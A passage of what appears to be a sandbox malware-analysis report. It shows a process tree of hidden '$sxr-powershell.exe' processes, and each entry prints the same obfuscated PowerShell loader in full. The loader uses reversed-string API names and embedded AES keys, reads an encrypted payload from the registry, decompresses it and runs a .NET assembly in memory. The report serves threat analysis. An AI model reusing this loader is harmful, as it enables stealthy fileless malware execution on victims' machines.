'')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2220
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:5460
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:6900
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = 